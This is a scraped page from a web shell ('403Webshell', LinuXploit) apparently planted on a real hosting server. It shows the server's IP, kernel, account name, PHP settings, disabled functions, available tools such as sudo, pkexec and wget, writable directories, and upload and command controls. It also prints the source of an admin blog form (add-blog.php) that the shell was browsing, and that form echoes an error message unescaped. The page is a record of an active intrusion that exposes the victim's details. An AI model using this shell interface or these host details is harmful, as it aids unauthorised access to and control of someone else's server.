403Webshell
Server IP : 101.53.144.229  /  Your IP : 216.73.216.104
Web Server : Apache
System : Linux host.gdigitalindia.in 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : digitalshiksha ( 1179)
PHP Version : 5.6.40
Disable Function : eval,show_source,system,shell_exec,escapeshellarg,escapeshellcmd,proc_close,proc_open,ini_alter,dl,show_source,curl_multi_exechellcmd, ini_restore,apache_get_modules,get_cfg_var,passthru, exec ,proc_get_status,fpassthru,c999_buff_prepare,c999_sess_put,c99_buff_prepare,c99_sess_put,proc_close,ini_alter,dl,symlink,link,proc_close,ini_alter,dl,symlink,link,mail
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/digitalshiksha/www/application/views/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/digitalshiksha/www/application/views/admin/add-blog.php
<?php $this->load->view('admin/head'); ?>
<?php $this->load->view('admin/header'); ?>
<div class="container-fluid py-4 mt-5">
    <div class="card">
        <div class="card-header p-0 position-relative mt-n5 mx-3 z-index-2">
            <div class="bg-gradient-primary shadow-primary border-radius-lg pt-4 pb-3">
                <center>
                    <h5 class="font-weight-bolder text-white">Blog Information</h5>
                </center>
            </div>
        </div>
        <div class="card-body">
            <form class="multisteps-form__form" method="post" action="addblog" enctype="multipart/form-data">

                <div class="pt-3 border-radius-xl bg-white" data-animation="FadeIn">

                    <div class="multisteps-form__content">
                        <div class="row mt-3">
                            <div class="col-12 col-sm-6">
                                <input type="hidden" name="date_added" value="<?=date("Y-m-d"); ?>">
                                <div class="input-group input-group-static m-2">
                                    <label for="post_title">Blog Title *</label>
                                    <input class="form-control" type="text" name="post_title" id="post_title" required>
                                </div>
                                <!-- <div class="input-group input-group-static m-2">
                                    <label for="blogger_name">Blogger Name</label>
                                    <input class="form-control" type="text" name="blogger_name" id="blogger_name" >
                                </div> -->
                            </div>
                            <div class="col-12 col-sm-6 mt-3 mt-sm-0">
                                <label for="category">Category</label>
                                <div class="input-group input-group-static m-2">
                                    <select name="category[]" id="category" class="form-control chosen-select"  multiple required>
                                        <?php foreach ($categories as $category) { ?>
                                        <option value="<?= $category['link'] ?>"><?= $category['name'] ?></option>
                                        <?php  } ?>
                                    </select>
                                </div>
                            </div>
                        </div>
                        <div class="row">
                            <div class="col-12 col-sm-12">
                                <div class="input-group input-group-static m-2">
                                    <label for="metatitle">Blog Meta Title *</label>
                                    <input class="form-control" type="text" name="metatitle" id="metatitle" required>
                                </div>
                                <div class="input-group input-group-static m-2">
                                    <label for="metadescription">Blog Meta Description *</label>
                                    <input class="form-control" type="text" name="metadescription" id="metadescription" required>
                                </div>
                                <div class="input-group input-group-static m-2">
                                    <label for="metakeywords">Blog Meta Keywords *</label>
                                    <input class="form-control" type="text" name="metakeywords" id="metakeywords" required>
                                </div>
                            </div>
                        </div>
                        <div class="row">
                            <div class="col-12 col-sm-12">
                                <label for="post">Description</label>
                                <div class="input-group input-group-static m-2">
                                    <textarea class="form-control" name="post"></textarea>
                                </div>
                            </div>
                            <div class="input-group input-group-static m-2">
                                <label for="image">Blog Image</label>
                                <div class="input-group input-group-static m-2">
                                    <input type="file" name="image" accept="image/*" required />
                                    <p>(Image Size Should be 800*400)</p>
                                </div>
                                <?php
                                if (!empty($_SESSION['success_msg'])) {
                                    echo '<p class="status-msg success">' . $success_msg . '</p>';
                                } elseif (!empty($_SESSION['error_msg'])) {
                                    echo '<p class="status-msg error">' . $_SESSION['error_msg'] . '</p>';
                                }
                                ?>
                            </div>
                        </div>
                        <button type="submit" name="submit" class="btn btn-primary w-20 mt-5">Submit</button>
                    </div>
                </div>
        </div>
    </div>
    </form>
</div>
</div>
</div>
</main>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
<script>
    CKEDITOR.replace('post');
</script>
<?php $this->load->view('admin/footer'); ?>

Youez - 2016 - github.com/yon3zu
LinuXploit